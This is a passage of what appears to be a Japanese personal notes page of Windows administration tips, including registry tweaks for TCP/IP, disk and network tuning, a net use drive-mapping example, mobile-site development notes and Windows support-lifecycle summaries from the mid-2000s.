名前    --- ---------- ---------- ------------ ----------------------     1 50 4294967295 connected Loopback Pseudo-Interf     16 10 1500 connected ローカル エリア接続    対象の IP アドレスに ping コマンド    C:\>ping -f 192.168.0.10 -l 1500    192.168.0.10 に ping を送信しています 1500 バイトのデータ:    パケットの断片化が必要ですが、DF が設定されています。    送信データを 8 の倍数ずつ減らして ping が通るまで確認。    C:\>ping -f sky -l 1492    192.168.0.10 に ping を送信しています 1492 バイトのデータ:    パケットの断片化が必要ですが、DF が設定されています。    C:\>ping -f sky -l 1468    192.168.0.10 に ping を送信しています 1468 バイトのデータ:    192.168.0.10 からの応答: バイト数 =1468 時間 >1ms TTL=128    192.168.0.10 の ping 統計:    パケット数: 送信 = 4、受信 = 4、損失 = 0 (0% の損失)、    ラウンド トリップの概算時間 (ミリ秒):    最小 = 0ms、最大 = 0ms、平均 = 0ms    コマンドプロンプトを管理者モードで実行し 1468+28(pingヘッダ)で設定します。 C:\>netsh interface ipv4 set interface "ローカル エリア接続" mtu=1496    【インターネットはこうして創られている〜IETFの仕組み】 第3回:RFCの読み方    http://internet.watch.impress.co.jp/docs/column/ietf2009/20091028_324722.html    (Obsoletes RFCXXXX)  RFCXXXXを無効に    (Obsoleted By RFCXXXX) RFCXXXXに置き換え    (Updates RFCXXXX)   RFCXXXXに追加して    (Updated By RFCXXXX)  RFCXXXXに追加事項   RFC 1323 のタイムスタンプおよびウィンドウ スケーリング オプションを制御 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : Tcp1323Opts データ型 : REG_DWORD 値 : 0 〜 3    0: RFC 1323 オプション無効    1: ウィンドウ スケール オプションのみ有効    2: タイムスタンプ オプションのみ有効    3: 両方のオプションを有効 ※ タイムスタンプとウィンドウ スケーリングはデフォルトで有効になっています。   SACK の使用を制御   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : SackOpts データ型 : REG_DWORD 値 : 0 または 1 デフォルト値は 1 (有効)   SACK (Selective ACK - RFC 2018) のサポートを有効にするかどうかを制御する。   TCP の再送動作制御(Fast Retransmit の開始に必要な ACK の数を制御)   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : SackOpts データ型 : REG_DWORD 値 : 1 〜 3 デフォルト値は 2   デフォルトでは、同じシーケンス番号の ACK を 3 つ (通常の ACK とさらに 2 つの ACK) 受信し   そのシーケンス番号が現在の番号より古い番号の場合セグメントが再送されます。 Windows 2000 および Windows Server 2003 の TCP 機能について セキュリティ更新プログラム 893066 は Windows 2000 で TCP 受信ウィンドウの既定のサイズを SP3 以前の既定のサイズ 17,520 バイトに戻す Next Generation TCP/IP Stack TCP/IP Registry Values for Microsoft Windows Vista and Windows Server "Longhorn" Microsoft Windows Server 2003 TCP/IP Implementation Details Technical Reference to the Windows 2000 Registry Start Page Microsoft Windows 2000 TCP/IP Implementation Details 修正プログラムが提供されて、ループバック待ち時間の TCP と UDP 遅延または Windows Vista で Windows Server 2008 の向上 The TCP receive window autotuning feature does not work correctly in Windows Server 2008 R2 or in Windows 7
Windows XP をファイルサーバとして使う場合のチューニング   Windows XP でシステム キャッシュを構成する   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management 値の名前 : LargeSystemCache データ型 : REG_DWORD 値 : 1(有効)   [ファイル名を指定して実行] をクリックし、sysdm.cpl と入力。   [詳細設定]>[パフォーマンス] >[設定] >[詳細設定] >[メモリ使用量]   ・[プログラム]:コンピュータをサーバーではなくワークステーションとして使用する場合   ・[システム キャッシュ] :サーバーとして使用する場合 ※上記レジストリが有効になります。    どちらか選択し、再起動する。 Windows XP でシステム キャッシュ モードを有効にする場合の注意事項
DivX のアクティベーションが出来ない場合の上限数の更新方法  1.DivXNetworks社の下記ウェブサイトにアクセス  http://www.divx.com/support/divxpro/request_increase.php  2.「Option 1: Automated Request」項目内のフォーム「Email Address: 」「Serial Number: 」を入力し「Submit」ボタンをクリック  3.下記の通り表示されたら受付完了。   Request DivX Pro Installation Increase   You should receive an email containing your serial number within the next 15 minutes.   If you do not receive an email it could mean that we’re unable to determine that the account does not exist based on the email address and serial number you entered,   if so please go back and use the Manual Request Form (Option 2) to request an increase.  上限数の更新がなされなかった場合は、「Option 2: Manual Request」項目内のフォームに入力し依頼する。
username:password を有効にする。   HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl 値の名前 : FEATURE_HTTP_USERNAME_PASSWORD_DISABLE データ型 : REG_DWORD 値 : 0:無効 1:有効 ※ FeatureControl は無いのでキーを作成。 詳しくは Internet Explorer で HTTP URL と HTTPS URL のユーザー情報を処理する際のデフォルトの動作を変更するセキュリティ更新プログラムの使用について
Office をインストールして、起動時に DCOM ( MDM.EXE ) がエラーを出している場合の対処。 CLSID {0C0A3666-30C9-11D0-8F20-00805F2CD064} の場合は レジストリエディタで検索すると MDM.EXE (Machine Debug Manager) という事が分かると思うので 1.コマンド プロンプトで「dcomcnfg.exe」を実行して [分散 COM の構成のプロパティ] ダイアログ ボックスを開く。 2.[アプリケーション] タブの DCOM サーバーの一覧で、[Machine Debug Manager] エントリを参照。   エントリが見つからない場合は、コマンド プロンプトで「mdm.exe /regserver」を実行してエントリを追加。 3.起動アクセス許可を与えるユーザーに    Interactive    System    Administrators    IWAM_   が登録されているか確認。 4.[識別] タブの [対話ユーザー]で[次のユーザー] をクリックして Administrators グループに属するユーザーのユーザー名とパスワードを入力。 5.コンピュータを再起動して、変更を有効にする。 参考 [PRB] DCOM サーバーを起動しようとするとアクセスが拒否される Microsoft Windows Server 2003 Service Pack 1 をインストールすると、DCOM を使用するプログラムが正常に動作しなくなる
CRC エラーやタイムアウトで HDD の転送速度が低下するのを避ける(XP 以降)     IDE/ATAPI ポートドライバの自動転送モード(自動的に転送速度を下げる機能)を停止     HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}\0001     HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}\0002     値の名前 : EnableUDMA66     データ型 : REG_DWORD     値 : 1(有効)0(無効)     ※ このキーは存在しないので作成する必要がある     値の名前 : ResetErrorCountersOnSuccess     データ型 : REG_DWORD     値 : 1(有効:リセットする)、 0(無効:リセットしない)     ※ 0001 がプライマリIDE、0002 がセカンダリIDE     タイミングモードの許可     値の名前 : MasterDeviceTimingModeAllowed 又は SlaveDeviceTimingModeAllowed     データ型 : REG_DWORD     値 : 0xffffffff(10進で4294967295)     タイミングモードの指定     値の名前 : MasterDeviceTimingMode 又は SlaveDeviceTimingMode     データ型 : REG_DWORD     値 : 0x12010 (UATA133:UltraDMAモード6)           Ultra ATA/33(UltraDMAモード2) :2010           Ultra ATA/66(UltraDMAモード4) :8010           Ultra ATA/100(UltraDMAモード5):10010           Ultra ATA/133(UltraDMAモード6):12010 ※ HDD によっては本来の性能を発揮していない(ATA133 なのに互換性の為 ATA100 で動作する場合も)あるようです。   メーカの HP で公開されているファームを適応すると本来の性能が発揮出来るようになります。 デバイスマネージャを開き、「IDE ATA/ATAPI コントローラ」の セカンダリ,プライマリ IDE チャネルのプロパティから「詳細設定」タブを開けば確認、設定できます。 PIO になっていたら DISK アクセスが低下しています。 高速モードに戻る事は有りませんので手動で変更しましょう。 ATAプロトコル UDMAモード[0〜6],PIOモード[0〜4] PIO mode 0 3.33MB/s PIO mode 1 5.22MB/s PIO mode 2 8.33MB/s PIO mode 3 11.1MB/s PIO mode 4 16.6MB/s Ultra DMA mode 0 16.6MB/s Ultra DMA mode 1 25.0MB/s Ultra DMA mode 2 33.3MB/s Ultra DMA mode 3 44.4MB/s Ultra DMA mode 4 66.6MB/s Ultra DMA mode 5 100MB/s Ultra DMA mode 6 133MB/s ※ Windows 2000 を長く使っている場合は PIO に変わってる可能性が高いです。 Windows XP における DMA と PIO の設定の場所 Windows 2000 はこの辺りの記事参照 http://www.atmarkit.co.jp/fpc/motoazabu/017_2001-06-08/win2ksp2_ata.html
2000 や XP で 137GB 以上の HDD を利用する場合に 48 ビット LBA サポートを正しく機能させる ・コンピュータに 48 ビット LBA 対応の BIOS がインストールされている。 ・コンピュータに 137 GB 以上の容量のハード ディスクが搭載されている。 の条件を満たしている場合は     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Atapi\Parameters     値の名前 : EnableBigLba     データ型 : REG_DWORD     値 : 1(有効)0(無効)     ※ このキーが存在しない場合は作成する必要がある 詳しくは  大容量ハードディスクの 137 GB を超えた容量が認識されない場合の対処方法  http://support.microsoft.com/kb/882350  Windows 2000 における ATAPI ディスク ドライブへの 48 ビット LBA サポート  http://support.microsoft.com/kb/305098  Windows XP で ATAPI ディスク ドライブに対して 48 ビット論理ブロック アドレス サポートを有効にする方法  http://support.microsoft.com/kb/303013  スタンバイまたは休止状態に入った場合やメモリ ダンプの書き込みでハード ディスク ドライブが破壊される可能性がある  http://support.microsoft.com/kb/331958  137 GB を超える大きさのミラー化されたドライブのパフォーマンスが低下する  http://support.microsoft.com/kb/314695  PreviousTaskFile メンバが Windows Server 2003 または Windows XP に間違っています。  http://support.microsoft.com/kb/898439
Vodafone 3G 端末向けにサイトを作成する上での注意点 Vodafone 3G 端末では、uid/sid/pid などは予約語となっており、予約語のついた URL が書かれているページにアクセスできない。 html ファイル内に <a href="http://hoge.com/?sid=hoge">hoge</a>というリンクがある場合に回覧不可能になります。 http://developers.vodafone.jp/dp/ http://developers.vodafone.jp/dp/tech_svc/info/useragent.php DoCoMo 以外は Submit ボタンに名前振っても拾えない気がする よって Submit を複数配置出来なかった気がする。。。 あと、POST 先の URL に パラメータ付けてとかも、そのパラメータを拾えなかった気がする(曖昧なので確認する事) ドメイン設定させる場合の URL  ドコモ  http://docomo.ne.jp/cp/mailurlfltst.cgi  AU    http://imutl.ezweb.ne.jp/cgi2001/utl_menu.cgi  ソフトバンク http://elinks.vodafone.ne.jp/selfcare ケータイWebアプリ開発、9つの注意点 http://www.atmarkit.co.jp/fwcr/special/mobile/01.html Firefoxでモバイル端末をシミュレートするアドオン「FireMobileSimulator」 http://ke-tai.org/blog/2008/09/04/firemobilesimlator/ モバイル向けサイト制作 http://www.thinkit.co.jp/channel/0810_2.html  第1回:携帯サイトとPCサイトはここまで違う!  http://www.thinkit.co.jp/article/143/1/  第2回:携帯サイトの制作から公開まで  http://www.thinkit.co.jp/article/143/2/ 進化するモバイル技術の基礎講座(1)Bluetoothとの連携も――さらなる進化を見せるFeliCa技術 http://monoist.atmarkit.co.jp/feledev/articles/monomobile/01/monomobile01_a.html モバイル通販「1回1万円以上使ってもいい」、利用者の半数が許容 http://www.nikkeibp.co.jp/article/news/20090928/184185/ 無料モバイルサイト解析ツール|myRTモバイル http://myrt.auriq.com/mobile/jp/ GoogleのWeb解析サービスに携帯サイト対応など新機能追加 http://www.itmedia.co.jp/enterprise/articles/0910/21/news081.html メールマーケティングのやり直し http://japan.internet.com/column/wmnews/20091028/7.html 知らないと損をする!感動の“超高速”検索術:1秒で見つけるGoogle検索 http://pc.nikkeibp.co.jp/article/knowhow/20100127/1022492/?P=1 携帯Webアプリ向け開発ツールのまとめ http://journal.mycom.co.jp/column/ide/077/index.html 携帯ユーザーの拡大でTwitter普及目指す - ケータイ版Twitterの狙いとは? http://journal.mycom.co.jp/articles/2010/03/12/twtr/index.html
google の検索条件時の制限解除(英語版サイトのみで有効) http://www.google.com/intl/en/ 「Preferences」をクリック。   「Interface Language」を、「Japanese」に   「SafeSearch Filtering」の「Do not filter my search results.」をチェック(ここが制限解除の設定)   「Save Preferences」を押して設定完了。 ※最近、英語版の google から来る人が増えたのは、これの影響かな? そのた。  ちょっと自慢できるこんな裏技 Googleを「仕事」で使い倒せ!(特集)  中国版Yahoo!でチョメチョメを検索すると・・・  http://sawasho.com/blog/archives/2005/05/yahoo.html  http://hobby7.2ch.net/test/read.cgi/occult/1113915124/313  グーグル社、中国政府の検閲に同意  http://hotwired.goo.ne.jp/news/culture/story/20060126207.html  そういえば、google はクッキーに固有のシリアルを埋め込んで、JavaScript 使って何かやってます・・・  ヘッダ情報をチェックすると判ります。  Googleがユーザーをウイルス扱い? Kaspersky Labが問題提起  http://www.itmedia.co.jp/news/articles/0706/16/news011.html   問題のメッセージ   http://www.google.com/sorry/misc/?continue  最近はじめた Google Trends が楽しいですね。  DB対決   SQL Server,oracle,mysql,PostgreSQL,XMLDB   http://www.google.com/trends?q=SQL+Server%2Coracle%2Cmysql%2CPostgreSQL%2CXMLDB&ctab=0&geo=all&date=all  oracle 強いなぁ・・・
Outlook Express で折り返し設定を有効にする     RFC2646 の Wrapping 機能を無効化     HKEY_CURRENT_USER\Software\Microsoft\Outlook Express     値の名前 : Disable RFC2646 Wrapping     データ型 : REG_DWORD     値 : 1     RFC2646 では、半角スペースなしに連続で入力された文字列をひと続きの文字列として認識し     改行などを行わないことを推奨しています。     日本語の文章は、多くの場合、ダブルバイトの文字のみが連続し、半角スペースが含まれないため     改行が行われないという問題が発生します。 Windows XP Service Pack 2 適用後、Outlook Express で折り返し設定が有効にならない 逆に、Thunderbird3 ではメニューから自動改行の文字数の設定が出来なくなりました。 Thunderbird - 環境設定 - 詳細 - 一般 の「設定エディタ」から mailnews.wraplength の値 (デフォルト:72) を 0 に変更すると改行されなくなります。
ASCII記号のURLエンコード対応表 CHAR CODE  HTML4.0 #番号 SPACE %20  &nbsp; &#160; ! %21 " %22 &quot; &#34; # %23 $ %24 % %25 & %26 &amp; &#38; ' %27 ( %28 ) %29 * %2A + %2B , %2C / %2F : %3A ; %3B < %3C &lt; &#60; = %3D > %3E &gt; &#62; ? %3F @ %40 [ %5B \ %5C ] %5D ^ %5E ` %60 { %7B | %7C } %7D ~ %7E
USB 外付けストレージへの書き込み禁止   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\StorageDevicePolicies   値の名前 : WriteProtect   データ型 : REG_DWORD   値     : 1 参考  USBメモリーへの書き込みを禁止する  http://arena.nikkeibp.co.jp/tec/winxp/20050304/111655/
ネットワークドライブにアクセスした時に、パスワードを聞かれないようにする net use コマンドをバッチを使ってスタートアップに入れておくと出来ます。 リソース(サーバ)の名前が HOME でフォルダが HOGE の場合 C:\>net use x: \\home\hoge /user:domain\user password 仮想の x ドライブに \\home\hoge フォルダを割り当てた状態になります。 Microsoft PowerToys for Windows XP の TweakUI.exe を利用しても出来るかも?(試してませんし調べてません) ひょっとして、マイネットワークを右クリックして「ネットワークドライブの割り当て」から出来るのでは… 「異なるユーザ名で接続する」ってあるし。
ネットワーク リソースへのアクセスを改善     KEY: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MrxSmb\Parameters     値の名前 : InfoCacheLevel     データ型 : REG_DWORD     値 : 0x10(16進)         0 = すべてのファイルとフォルダのキャッシュを無効にします。         1 = 短いファイル名 (8.3 形式) のキャッシュを有効にします。デフォルトの値です。         10 = すべてのファイルのキャッシュを有効にします。     ネットワーク ベースのファイルで、8.3 形式の短いファイル名構文ではなく     長いファイル名構文が使用されている場合にサーバー メッセージ ブロック (SMB)     リダイレクタ コンポーネントは、長いファイル名のパス情報をキャッシュしません。     情報がキャッシュされないと、Windows XP では GetFileAttributes 関数呼び出しのたびに     2 個の SMB パケットが送信されます。     fsutil.exe behavior set disable8dot3 1 で上記 0 の動作を設定出来ます。 参考 Windows XP でのネットワーク リソースへのアクセスが、以前のバージョンの Windows に比べて遅い セキュリティ更新プログラム 885250 (MS05-011) のインストール後、Windows XP または Windows Server 2003 でネットワーク共有のサブフォルダの内容が表示されないことがある NTFS パーティション上の 8.3 形式の名前の作成を無効にする方法
Windows Server 2003 SP1 で仮想 CD が使いたい場合 vcdrom.sys を使うとマウント出来るようになります。 使い方は @IT に書かれていますのでそこを参考に。 仮想CD-ROMイメージをマウントする(vcdrom.sys編) DAEMON TOOLS も問題なくなりました。が、アドウェアがセットでついてくるので注意。  DAEMON TOOLS  http://www.daemon-tools.cc/dtcc/announcements.php  「Daemon Tools」最新版v4.00にアドウェアが同梱  http://www.forest.impress.co.jp/article/2005/11/15/daemon40adware.html
ストリーミング配信  通信と放送の融合:家庭内で先行か 野村総研  http://www.mainichi-msn.co.jp/it/solution/news/20050603org00m300105000c.html を読んだ。 IIS5.0 の時は試した事があったけど(マシンパワー不足でフリーズしたけど・・・) 2003 でも試してみるか。。。 PC からコントロール出来るリモコンと、キャプチャカード(デジタル放送対応してるのってあるのかな?) で、IIS(ローカルネットワークのみアクセス可能)にしたら ブラウザで TV 視聴可能になるわけだし。。。 って、昔考えて NTTのフレッツロボは買ってはみたけど、、、埃まみれ。 これだけだと、意味ないので  ストリーミング用プロトコル  rtsp://  mms://  利用するポートは、、、忘れた。  RTSP protocol  554/tcp  6970-6999/udp 最近は音楽配信が流行ってサイトが乱立しているみたいだけど 録音したデータを会社でこっそり聞くため(笑)2000年頃から 自分用にサイトを作ってたりする。。。 って書くと、変なアクセス増えるかなぁ…   げ、サーチエンジンで URL 漏れてるじゃん。URL 変えておこう、、、汗   それにしても何で出てくるんだ?気持ち悪いなぁ・・・ 構築の仕方は暇なときに、コンテンツに追加・・・できるといいなぁ、、、 Windows Media 9 シリーズ - ファイアウォール情報 http://www.microsoft.com/japan/windows/windowsmedia/serve/firewall.aspx クライアントが Windows Media Player を使用して Windows ファイアウォール経由でマルチキャスト ストリームやその他の UDP ストリームに接続できないことがある http://support.microsoft.com/kb/883831 Windows XP SP2 で Windows ファイアウォール サービスは開始できません。 http://support.microsoft.com/kb/920074 [WMP]Secure Sockets Layer ストリームを再生できない http://support.microsoft.com/kb/285028 IE 上に貼り付けた アクティブコンポーネントなら動きます。 が、WMP11βは30分以上のストリーミング再生が出来ないような… キャプチャ パフォーマンスの向上 http://www.microsoft.com/JAPAN/developer/library/jpdx8_c/ds/Oview/Improving_Capture_Performance.htm ストリームの圧縮・解凍方法 - VB マイグレーション Tips http://www.microsoft.com/japan/msdn/vbasic/migration/tips/GZipStream/ デジタルを楽しむ 第1回 メディア・サーバーでデジタル・コンテンツを楽しむ http://itpro.nikkeibp.co.jp/article/COLUMN/20060224/230623/ DLNA が本格普及してくると、不要になるかな。。。 Windows Media Playerの修正パッチに問題,再生が中断される場合あり http://itpro.nikkeibp.co.jp/article/NEWS/20060309/232187/ イニシア、自宅PCから動画のライブ配信ができる「Clipstream Live」を発売 http://japan.cnet.com/news/media/story/0,2000056023,20109687,00.htm 映像コンテンツのメタデータ管理ソフト、事業者向けにFMMCが無償配布 http://internet.watch.impress.co.jp/cda/news/2006/06/23/12440.html 「コピーし放題」でも儲かる!? DRMフリー音楽の今 http://www.ascii.jp/elem/000/000/071/71759/ MicrosoftがMP3でDRMフリー音楽配信へ,携帯用プレーヤ「Zune」も全面刷新 http://itpro.nikkeibp.co.jp/article/NEWS/20071004/283810/ 【連載企画】  合法的音楽配信サイトを作ってみる(1)  http://blogs.itmedia.co.jp/kurikiyo/2007/09/jasrac_c023.html  合法的音楽配信サイトを作ってみる(2)  http://blogs.itmedia.co.jp/kurikiyo/2007/09/post_45ce.html  合法的音楽配信サイトを作ってみる(3)  http://blogs.itmedia.co.jp/kurikiyo/2007/09/post_01ec.html  へぇ。。。  ストリーム配信のみで月額1000円なら、配信出来ない事は無いな…  あわせてこのあたりも。   コピーライト資料館   http://www.kidscric.com/siryo/siryo.html   著作権学習コンテンツ   http://deneb.nime.ac.jp/contents/index.htm 米Yahoo!、楽曲のフルトラック再生が可能な無料サービスの提供を開始 http://journal.mycom.co.jp/news/2008/09/19/033/ そのうち専用ガジェットプレーヤー出そうですね。 第374回:DLNA 1.5で可能になった「3BOX」環境を試す http://internet.watch.impress.co.jp/docs/column/shimizu/20100112_341012.html
ルータ SIP対応ルータに変えてから、ドメインコントローラの調子がすこぶる悪いきがする(落ちる) 単純に電源不良なだけかなぁ。。。 で、電源を250Wから 485Wに付け替えてみましたが改善されず、、、 悪化して起動もしない(ファンが動いたり止まったりを繰り返す)状況に陥ったので、諦めて DELL のサポートで連絡。 対応事態は翌日していただけましたが、マザー、CPU、メモリと交換しても変わらず・・・(呪われてる?) 結局、原因は Power スイッチだったんですけどね。。。 どうやら勝手に ON、OFF を繰り返していたらしい。 OS(Windows)が安定しないなぁ・・・と思いきや、盲点でした。 今おぼえば、SC600(DELL)買った当時から月1回は勝手に落ちてたような、、、 初期不良だったのでしょうが、よく2年も動いてたものだ(そもそも気づかないよ、これが原因だと) 初期不良といえば、会社の DELL の PC もそうで、同時期に買ったPC全てが不良品。 リコールは出てないようですが、OptiPlex GX270 を使っている人は、一度マザーを確認した方が良いかも。 コンデンサが膨張してたらサポートに連絡してマザーの交換をしてもらいましょう。。 (コンデンサの頭が平らでなく盛り上がってたら不良品です) このマザーに付いてるコンデンサの頭が (×)タイプは古いもので、(K)タイプは対策品らしい。(交換されたものはそうなってました) また、内臓の時計が狂う(主電源のコンセント抜いて5分後くらいに起動してみる)場合もマザーボードの交換対象になるようです。(電池だけの交換は無いらしい) と、いう事で暫くアクセスが出来なかったのは、ハードの故障でハッカーにやられたわけではありません。 BPS(バトルプログラマーシラセ) に出てきた事をやられたのかと一瞬思いましたが(笑 関連 デル1社では済まない--PCメーカーを揺るがす不良コンデンサ 「CG-FSW8AW/8AB」の不具合についてのお詫びと無償交換のご案内(コレガ) 2008.9.1 DELL の PC が不具合で火災 だそうで、2003年5月〜2004年11月に国内で出荷された Dimension 2400c, 4600c で電源装置の故障が原因だそうです。問合せ先は (0120)198499  デル製パソコン2機種14万台に不具合、通電不良や発煙の恐れ  http://itpro.nikkeibp.co.jp/article/NEWS/20081001/315862/  ひょっとして、SC600 を買った時とかぶってる?  自宅に置くにはファーンの音が問題で知り合いに上げちゃいましたけど。  まだ SC1420 の爆音にも悩まされているたりしますので、次はこれを何とかしたいですねぇ。
P3P の作成方法 確認中・・・ 【絵で分かるキーワード】P3P(The Platform for Privacy Preferences(ASCII) http://review.ascii24.com/db/review/soft/web/2003/06/01/643973-000.html Web サイトに P3P プライバシー ポリシーを導入する方法(Microsoft) http://www.microsoft.com/japan/msdn/workshop/security/privacy/overview/createprivacypolicy.asp Platform for Privacy Preferences 1.0 (P3P1.0) 仕様書 (W3C勧告 2002年4月16日) http://www.iajapan.org/trans2japanese/w3c/rec-p3p-20020416j.html とりあえず、 CP 書いとけば OK のようで。 MS サイト(www.microsoft.com)の HEAD 情報 ------------------------------------------- Date: Mon, 27 Jun 2005 06:38:55 GMT Content-Length: 21459 Content-Type: text/html; charset=utf-8 Cache-Control: private Server: Microsoft-IIS/6.0 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Via: 1.1 cache3 (NetCache NetApp/5.3.1R1) ------------------------------------------- 参考  検証 IE 6のプライバシ管理機能  2.より高機能なプライバシ管理を可能にするP3P  http://www.atmarkit.co.jp/fwin2k/experiments/ie6privacy/ie6privacy_03.html ポリシー作成は 個人情報保護とプライバシー情報管理システムhttp://fs.pics.enc.or.jp/p3pwiz/p3p_ja.html から簡単に作成できるようです。 P3Pコンパクトポリシーをコピペするのが流行らないことを祈る http://bakera.jp/ebi/topic/3594
Windows 98 と 2000 のサポート期間 > Windows 2000が7月1日から延長フェーズへ突入,ユーザーは注意 > http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050627/4/ メインストリームのサポートは製品発売から5年間または次期バージョン発売後2年間  よって   Windows 2000 Professional の後継である Windows XP が 2001年10月   Windows 2000 Server の後継である Windows 2003 Server が 2003年6月 メインストリームが 2005年6月30日で終了になる訳ですが 延長サポートが、5年間または次々期バージョン発売後2年間のいずれか長いほうとなる。(最短で10年間提供される) 問題となってくるのが、メインストリームでサポートされてた事がどう変わるか。って事になってきますが メインストリームサポートで提供されていたのが  「有償サポート」  「セキュリティ更新プログラムの提供」  「セキュリティ関連以外の修正プログラムの提供」  「無償インシデントサポート」  「デザイン変更及び機能追加」  「サポート技術情報の提供」  「マイクロソフトヘルプとサポートサイト」 で、 メインストリーム終了後に打ち切られるのが  「セキュリティ関連以外の修正プログラムの提供」※メインストリームサポート終了後、90日以内に延長修正プログラムの契約により有償で提供。(たぶん高い)  「無償インシデントサポート」  「デザイン変更及び機能追加」 の3つ。 ここで注意しなければならないのが Windows Update を通じてセキュリティ更新プログラムを入手出来るのが「原則として延長サポートの最初の2年間」だけって事です。 その後どうなるか、と言うと「ダウンロードセンターで提供されるので自分で取りに行くしかない」って事になっているようです。 URL は http://www.microsoft.com/downloads/ Windows 2000 SP2 以前は、既に延長サポート終了で、Windows 2000 SP3 が2005年 6月30日で終了します。 IE も Windows 2000 SP4 で動作する 6.0 SP1 のみ延長サポートの対象 Windows 98、Windows 98 SecondEdition、Windows MilenniumEdition たちはどうか、というと OS や OS 上で使用する IE 6.0 SP1 は 2006年 6月30日で打ち切りです。> 残り1年 Windows 2000 SP4 用の更新プログラム ロールアップ 1 http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=c0a2ca36-1179-431c-80e6-60a494d3823d Windows 2000用のUpdate Rollup 1、適用後の不具合を修正した新バージョン http://internet.watch.impress.co.jp/cda/news/2005/09/14/9132.html ダウンロード http://www.microsoft.com/downloads/details.aspx?amp;displaylang=ja&familyid=B54730CF-8850-4531-B52B-BF28B324C662&displaylang=ja XP HOME 【Windowsコラム】【特集】どうする「寿命切れ迫るWindows XP」 (第1回)XPユーザーは「サポート終了」と「SP 3の出荷延期」に注意 http://itpro.nikkeibp.co.jp/article/Windows/20060207/228689/ (第2回)「XP Homeに関するポリシーを変更する予定はない」---MS http://itpro.nikkeibp.co.jp/article/Windows/20060207/228690/ (第3回)メーカーで異なるセキュリティ・パッチの適用状況 http://itpro.nikkeibp.co.jp/article/Windows/20060208/228790/ Windows XP Homeはあと3年でパッチがリリースされなくなる http://slashdot.jp/article.pl?sid=06/02/08/1258212 Windows Vistaを待つべきか、そろそろ考えてみませんか? http://arena.nikkeibp.co.jp/col/20060207/115286/  Windows デスクトップ製品のライフサイクル  http://www.microsoft.com/japan/windows/lifecycle/default.asp  サービスパックロードマップ  http://www.microsoft.com/japan/windows/lifecycle/servicepacks.asp
Microsoft Operations Manager 2005 http://www.microsoft.com/japan/mom/default.mspx 携帯電話から簡単にサーバにアクセス出来る携帯管理コンソール(Mobile Phone Console) があるようです。 携帯電話からサーバのリモート管理を実現する「日本独自」の製品だそうで「いつでも」「どこからでも」稼動状況が把握できる! って事みたいです。障害が発生した際にはメールで通知って機能もあるらしい。
MSDN http://go.microsoft.com/?linkid=3433135 OS の勉強したいなら、Windows オペレーティング システム を手に入れましょう。  Windows Review Windows 2003 SP1開発者インタビュー(前編)  http://itpro.nikkeibp.co.jp/free/NT/WinInterview/20050624/1/ 単独で購入するより、多分安く済みます。  MSDN オンライン公開の最新技術情報から自分の関心のある記事を絞り込めます。  http://go.microsoft.com/?linkid=3433134  MSDN Connection は、お客様から登録いただいた興味分野に該当する技術資料を  一覧としてまとめてお届けします。お客様が必要な情報を 1 ページに集約できます。  これは便利かも。  マイクロソフト製品を購入前にテストする「最安」の方法:ITPro  http://itpro.nikkeibp.co.jp/article/COLUMN/20070926/283045/?ST=win  あとは、実機が無くてもテストできるバーチャルラボとか。   TechNet Virtual Labs   http://www.microsoft.com/japan/technet/traincert/virtuallab/default.mspx 『TechNet』の歩き方 http://journal.mycom.co.jp/series/technet/menu.html
Mark of the Web http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/overview/motw.asp <!-- saved from url=(0014)about:internet --> ↑は、文字数。 ってソースに書いとく。 url=(13)about:internet はミスですよねぇ… "Windows XP Service Pack 2 セキュリティ強化機能搭載" での機能の変更点 第 5 部 : ブラウズのセキュリティ強化 http://www.microsoft.com/japan/technet/prodtechnol/winxppro/maintain/sp2brows.mspx#E42AG ↑ url=(13)about:internet って書かれている。 スクリプトは、 Windows XP Service Pack 2 または Windows XP Tablet PC Edition 2005 で .htc または .xml ファイルを参照するローカル HTML Web ページで実行されない可能性があります。 http://support.microsoft.com/kb/884322/ja ↑ url=(13)about:internet って書かれている。 データ アクセス ページの表示は、 Windows XP Service Pack 2 を実行しているコンピュータでブラウザでプレビュー モードでブロックされます。 http://support.microsoft.com/kb/883866/ja ↑ url=(14)about:internet って書かれている。
VPN Windows Server 2003 を使用した仮想プライベート ネットワーキング: リモート アクセス VPN の展開 http://www.microsoft.com/japan/technet/prodtechnol/windowsserver2003/technologies/networking/vpndeplr.mspx プライベート ネットワークや Windows Server 2003 のインターネットを経由する Point-to-Point 通信をセキュリティで保護する方法 http://support.microsoft.com/kb/324747/ja PPTP トラフィックの分析 http://www.microsoft.com/japan/technet/community/columns/cableguy/cg0103.mspx VPN サーバーとファイアウォールの構成 http://www.microsoft.com/resources/documentation/WindowsServ/2003/standard/proddocs/ja-jp/Default.asp?url=/resources/documentation/WindowsServ/2003/standard/proddocs/ja-jp/sag_VPN_und13.asp VPN(Virtual Private Network)構築編 http://www.e-ryoichi.net/vpn/vpn_built_packet_fitering.html インターネットVPN環境を構築する http://www.atmarkit.co.jp/fwin2k/verification/vpn01/vpn01_04.html SoftEther VPN 2.0 の Web サイト http://www.softether.com/jp/vpn2/ 在宅勤務を実現するリモート・アクセスVPN構築術 最終回 − @IT http://www.atmarkit.co.jp/fwin2k/operation/remvpn02/remvpn02_01.html PPTP のパケットフィルタ TCP/1723 GRE/47  確認コマンド portqry.exe -n [SERVER IP] -e 1723   TCP port 1723 (pptp service): LISTENING  と表示されればOK L2TP/IPSec のパケットフィルタ 